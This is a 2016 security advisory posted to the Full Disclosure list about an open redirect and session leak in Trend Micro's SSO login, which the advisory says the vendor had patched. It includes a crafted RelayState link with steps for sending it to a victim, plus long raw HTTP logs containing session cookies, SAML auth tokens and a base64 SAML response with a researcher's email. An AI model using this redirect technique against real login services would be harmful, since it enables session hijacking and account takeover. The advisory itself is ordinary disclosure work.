[<prev] [next>] [day] [month] [year] [list]
Message-ID: <56FD126D.1000907@vulnerability-lab.com>
Date: Thu, 31 Mar 2016 14:05:01 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Trend Micro (SSO) - (Backend) SSO Redirect & Session
Vulnerability
Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1694
Trand Micro ID: 1-1-1035080936
Release Date:
=============
2016-03-31
Vulnerability Laboratory ID (VL-ID):
====================================
1694
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
business.
Its cloud and virtualization security products provide cloud security
for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva
Chen
serves as Trend Micro’s chief executive officer, a position she has held
since 2005 when she succeeded founding CEO Steve Chang. Chang serves as
chairman of Trend Micro.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a redirect
and session web vulnerability in the official trend micro sso online
service web-application.
Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri
- Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A redirect issue with information leaking has been discovered in the
official Trendmirco online-service web-application.
The vulnerability allows an attacker to send a crafted link to the
victim. The execution (which requires a login) will disclose leaking
information to the attackers webserver.
In this case the AuthState value is beeing leaked.
The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked
by the victim the website requests him to login. After the login the
victim is beeing quitly redirected to the webserver. The previous
requests includes the new AuthState in
the GET request which includes the users session. The AuthState is
beeing exposed in the Referer afterwards. The attacker can use the
AuthState value to overtake the account session.
The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked by
the victim the website requests him to login. After the login the victim
is beeing quitly redirected to the webserver. The previous requests
includes the new AuthState in the GET
request which includes the users session. The AuthState is beeing
exposed in the Referer afterwards. The attacker can use the AuthState
value to overtake the account session.
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without
privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
2. The victim will redirect to yahoo
3. The AuthState code will cached on the referer of the attackers
website ... like on yahoo
4. Successful reproduce of the vulnerability!
--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[-1] Mime Type[text/html]
Request Headers:
Host[sso1.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070;
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:22 GMT]
Server[Apache/2.2.15 (CentOS)]
Strict-Transport-Security[max-age=63072000; includeSubdomains;
preload]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]
POST
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[368] Mime Type[text/html]
Request Headers:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]
Connection[keep-alive]
Post Data:
SAMLResponse[PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iIElEPSJfZGZkMjU2NGNkNjI1NTYzOTBjNDI1ZGJiOTA4YWY1MDNiOGQ1ZmUwMmJiIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiIERlc3RpbmF0aW9uPSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIj48c2FtbDpJc3N1ZXI%2BaHR0cHM6Ly9zc28xLnRyZW5kbWljcm8uY29tL3NpZ25pbi9zYW1sMi9pZHAvbWV0YWRhdGEucGhwPC9zYW1sOklzc3Vlcj48ZHM6U2lnbmF0dXJlIHhtbG5zOmRzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjIj4KICA8ZHM6U2lnbmVkSW5mbz48ZHM6Q2Fub25pY2FsaXphdGlvbk1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPgogICAgPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPgogIDxkczpSZWZlcmVuY2UgVVJJPSIjX2RmZDI1NjRjZDYyNTU2MzkwYzQyNWRiYjkwOGFmNTAzYjhkNWZlMDJiYiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3NoYTEiLz48ZHM6RGlnZXN0VmFsdWU%2BSDNlcVhEaWVOWG5YcnBRaUZ4cmxYZ25tbVJnPTwvZHM6RGlnZXN0VmFsdWU%2BPC9kczpSZWZlcmVuY2U%2BPC9kczpTaWduZWRJbmZvPjxkczpTaWduYXR1cmVWYWx1ZT5tTGVPZkpDZFRkQzRPTXp4dVk2NnEvcE91UG5LYUxTS2tBY1Y4RFoxM25iNklSSEFTV3hVL3dlZE96OU9WaXN6Y2lTN0h6dlpSQ2djQXo3amgwdTlpazlmam4yNE5PR09ObjZySG9ra0xQaXY4N2FpUWMvSkN6emd1M1pmQzcrV3pXOXY4QW5DZjIxWmZ6RDArWDZyb3lvLzkrQkVXVmtJVmkzNklEWVdWOFJSeXVqTVFQUFQxZ3NXYTVXUzQ3aE5WUmdZcyt3YmlzbklGMG81TWovaWlUdjdobUZaQ2VDTWljMm03RENQM2lnQlR3R0hrZnpsUC9FdldGcXJldnV3clZkVS9VS3FDRjltcXNjeG5INWE5YkNxZmU2ekIzK2wzdHZkSDgwd0Z3Tkg0aldvSWRXY1hPOTZEbUQ2MEs0QUQ1YVpIcW45Uk9YR1JwaUNyanhRL0E9PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BCjxkczpLZXlJbmZvPjxkczpYNTA5RGF0YT48ZHM6WDUwOUNlcnRpZmljYXRlPk1JSURGRENDQWZ5Z0F3SUJBZ0lKQUtoSmdOUDAvZzZhTUEwR0NTcUdTSWIzRFFFQkJRVUFNQkF4RGpBTUJnTlZCQU1UQlZSbGNuSmhNQjRYRFRFeE1ERXdNekF5TURFME4xb1hEVEl3TVRJek1UQXlNREUwTjFvd0VERU9NQXdHQTFVRUF4TUZWR1Z5Y21Fd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURad2FJSmVwdHJJaVV4WjVXbDVMVVEvS0VpbEtPRmRZTWdTSjg0RkxDRTNXYlk2U1NWcURqWmYvcEM1dU4waFg4R0xPL3Z2UExVaGFHa1ZpdXhzSVRYM1VOUThLT1VlVW1lMHBVb1lFSWxFbjdJRmZuR29SQlV1eDJaTkVXVWRXelV3Z3RrR2dqRzhnTnROTGlnT3ZJN1ZPTndPZEM3bzZ0TUlHWm12azA1NFZLN2ZKMTkyTTJYNnNmay9YQnBicE5NWk5hQWRrR2dISlJqNk9UR2I5QkFPbzR3M2E3RTd0eVRveEd2czFpQWtQalg1SXE2NGltTFdnOW1OWjMvNkpZOHVhMkVpcXZhU0lsSHFZZzNJNjA2OEdCYlhZeDJtZmNLdlNFbTBwdDFoTm0zOExGdVVJNC9TQm1vVDFKeXRLcTIvQnNLc2o3RnZDWkRYck5Xb1NRcEFnTUJBQUdqY1RCdk1CMEdBMVVkRGdRV0JCUzF3OU1HSWRxMmQ2MmlVSkJFKzdLem5xNTFOVEJBQmdOVkhTTUVPVEEzZ0JTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5hRVVwQkl3RURFT01Bd0dBMVVFQXhNRlZHVnljbUdDQ1FDb1NZRFQ5UDRPbWpBTUJnTlZIUk1FQlRBREFRSC9NQTBHQ1NxR1NJYjNEUUVCQlFVQUE0SUJBUUFQbDFtb0hUTGg1M3BkOGdhVU9uY1FJUFB6dFBvR1NiVURpclA2OFk5SVhGYmwwd3I3NnlFK0ROYys1cEExK0xZNDkvdjBPZ3BuTXY3UGlPTFhMQzNhdnpKVFhkSW9GS2Z2Mno3T24zaEp1d3EyUHpacHF4RXVzVEdHSkRHaW9BSnJSOU1PSzQ5Q1hVYmdaMTVvY0ZkUXVpays5ZDJXaHJqQW1ueEtLbVVJZWxOOEpWVjFTQWhwOUpjN2NiZTJJZVl0cFViSyt0QnVROFFvT01tTUtxTEh3UE5ad2RYT0o1NWFsNHBLT3VzVTJSOXpyZnREWXlFUU1KOHVIZkdCSzZtYnoxWEFDOG9QUW5FQ2VkS0I4a3I0eG9md09aWjRCSmNZZDhNQ3ptNUNXRmtBRHljQTRrNlVvd1pnODY0dWFEbk1lZ2VxN1Vwd3NlZks3RzFJVzdpSzwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbHA6U3RhdHVzPjxzYW1sOkFzc2VydGlvbiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIElEPSJfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiPjxzYW1sOklzc3Vlcj5odHRwczovL3NzbzEudHJlbmRtaWNyby5jb20vc2lnbmluL3NhbWwyL2lkcC9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BCiAgICA8ZHM6U2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3JzYS1zaGExIi8%2BCiAgPGRzOlJlZmVyZW5jZSBVUkk9IiNfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIj48ZHM6VHJhbnNmb3Jtcz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI2VudmVsb3BlZC1zaWduYXR1cmUiLz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPC9kczpUcmFuc2Zvcm1zPjxkczpEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjc2hhMSIvPjxkczpEaWdlc3RWYWx1ZT5sbk1xNmtkUHdCdTJ3WE04cjRZeEdqNGRMUFk9PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGRzOlNpZ25hdHVyZVZhbHVlPmpZbkxvblhIdEdCOGlxODRQZFpXOWpFdzJndWRxM0tEQ3FyMGtEQjl4TW4xUXE3TG1FQ3B6cUFRei93ZFFVSUx6cHlRNFgvQWREME5nTFJudk1nK0dEWmNjRWZvUWhTVC9VSithdmJHVFAvMTFrM2Mvczl5c0ZwcjlKSG5LOU9uMkUxUVlBeXdEMnhIWHE4NnZjNEU1YjVOYzM4MFozeUpkYi8yNmwxQllrWm9wV3ltMGY4L0EzUmJENlJNdkFBK1VPajUwK0FTcnMwa0N3SEdJSllCS2hwM3BwQXhPMWg3bkNqVGUremx2elpOV3RFTDNtOFpRQjhSckhQVU9CR2FZdjZTQTBHNDBRNkFyeE4yR3BHVjJENzN5MWprQ2ZSK0Q3d0RqUTMrRlBPekozNGo0L2haUi9seWJqeFRqTkFNUVpDbWk5UFM2dzNXcTJDL3EydHo3Zz09PC9kczpTaWduYXR1cmVWYWx1ZT4KPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJREZEQ0NBZnlnQXdJQkFnSUpBS2hKZ05QMC9nNmFNQTBHQ1NxR1NJYjNEUUVCQlFVQU1CQXhEakFNQmdOVkJBTVRCVlJsY25KaE1CNFhEVEV4TURFd016QXlNREUwTjFvWERUSXdNVEl6TVRBeU1ERTBOMW93RURFT01Bd0dBMVVFQXhNRlZHVnljbUV3Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLQW9JQkFRRFp3YUlKZXB0cklpVXhaNVdsNUxVUS9LRWlsS09GZFlNZ1NKODRGTENFM1diWTZTU1ZxRGpaZi9wQzV1TjBoWDhHTE8vdnZQTFVoYUdrVml1eHNJVFgzVU5ROEtPVWVVbWUwcFVvWUVJbEVuN0lGZm5Hb1JCVXV4MlpORVdVZFd6VXdndGtHZ2pHOGdOdE5MaWdPdkk3Vk9Od09kQzdvNnRNSUdabXZrMDU0Vks3ZkoxOTJNMlg2c2ZrL1hCcGJwTk1aTmFBZGtHZ0hKUmo2T1RHYjlCQU9vNHczYTdFN3R5VG94R3ZzMWlBa1BqWDVJcTY0aW1MV2c5bU5aMy82Slk4dWEyRWlxdmFTSWxIcVlnM0k2MDY4R0JiWFl4Mm1mY0t2U0VtMHB0MWhObTM4TEZ1VUk0L1NCbW9UMUp5dEtxMi9Cc0tzajdGdkNaRFhyTldvU1FwQWdNQkFBR2pjVEJ2TUIwR0ExVWREZ1FXQkJTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5UQkFCZ05WSFNNRU9UQTNnQlMxdzlNR0lkcTJkNjJpVUpCRSs3S3pucTUxTmFFVXBCSXdFREVPTUF3R0ExVUVBeE1GVkdWeWNtR0NDUUNvU1lEVDlQNE9takFNQmdOVkhSTUVCVEFEQVFIL01BMEdDU3FHU0liM0RRRUJCUVVBQTRJQkFRQVBsMW1vSFRMaDUzcGQ4Z2FVT25jUUlQUHp0UG9HU2JVRGlyUDY4WTlJWEZibDB3cjc2eUUrRE5jKzVwQTErTFk0OS92ME9ncG5NdjdQaU9MWExDM2F2ekpUWGRJb0ZLZnYyejdPbjNoSnV3cTJQelpwcXhFdXNUR0dKREdpb0FKclI5TU9LNDlDWFViZ1oxNW9jRmRRdWlrKzlkMldocmpBbW54S0ttVUllbE44SlZWMVNBaHA5SmM3Y2JlMkllWXRwVWJLK3RCdVE4UW9PTW1NS3FMSHdQTlp3ZFhPSjU1YWw0cEtPdXNVMlI5enJmdERZeUVRTUo4dUhmR0JLNm1iejFYQUM4b1BRbkVDZWRLQjhrcjR4b2Z3T1paNEJKY1lkOE1Dem01Q1dGa0FEeWNBNGs2VW93Wmc4NjR1YURuTWVnZXE3VXB3c2VmSzdHMUlXN2lLPC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kczpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPHNhbWw6U3ViamVjdD48c2FtbDpOYW1lSUQgU1BOYW1lUXVhbGlmaWVyPSJteWFjY291bnQtc3AiIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6dHJhbnNpZW50Ij5fNWVkYmFkMzJmYzYyNWM4Y2VjZWM0MjRmZGQzYmE5ZGY0NmM5ZWY4OWVjPC9zYW1sOk5hbWVJRD48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uIE1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmNtOmJlYXJlciI%2BPHNhbWw6U3ViamVjdENvbmZpcm1hdGlvbkRhdGEgTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDEyOjI1OjIzWiIgUmVjaXBpZW50PSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIi8%2BPC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24%2BPC9zYW1sOlN1YmplY3Q%2BPHNhbWw6Q29uZGl0aW9ucyBOb3RCZWZvcmU9IjIwMTYtMDEtMjlUMTI6MTk6NTNaIiBOb3RPbk9yQWZ0ZXI9IjIwMTYtMDEtMjlUMTI6MjU6MjNaIj48c2FtbDpBdWRpZW5jZVJlc3RyaWN0aW9uPjxzYW1sOkF1ZGllbmNlPm15YWNjb3VudC1zcDwvc2FtbDpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbj48L3NhbWw6Q29uZGl0aW9ucz48c2FtbDpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTYtMDEtMjlUMTE6NTE6MzlaIiBTZXNzaW9uTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDIwOjIwOjIzWiIgU2Vzc2lvbkluZGV4PSJfNzRhNjY1Y2I5NmE2ZDY0ZTQyZmE1YjhkNTAyYmRkYTEwNzZkMTQyMDhmIj48c2FtbDpBdXRobkNvbnRleHQ%2BPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmQ8L3NhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BPC9zYW1sOkF1dGhuQ29udGV4dD48L3NhbWw6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWw6QXR0cmlidXRlU3RhdGVtZW50PjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj5zYW1pckBldm9sdXRpb24tc2VjLmNvbTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudE5hbWUiIE5hbWVGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphdHRybmFtZS1mb3JtYXQ6YmFzaWMiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlIHhzaTp0eXBlPSJ4czpzdHJpbmciPnNhbWlyQGV2b2x1dGlvbi1zZWMuY29tPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBdHRyaWJ1dGU%2BPHNhbWw6QXR0cmlidXRlIE5hbWU9IkNvbnN1bWVyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj41MDE5NzM3Mzwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ%2BPC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D]
RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:24 GMT]
Server[Apache]
Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d;
path=/; httponly]
Location[https://yahoo.com/my_account/]
Pragma[no-cache]
Cache-Control[no-cache, must-revalidate]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[368]
Connection[close]
Content-Type[text/html; charset=UTF-8]
GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI
LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime
Type[text/html]
Request Headers:
Host[yahoo.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
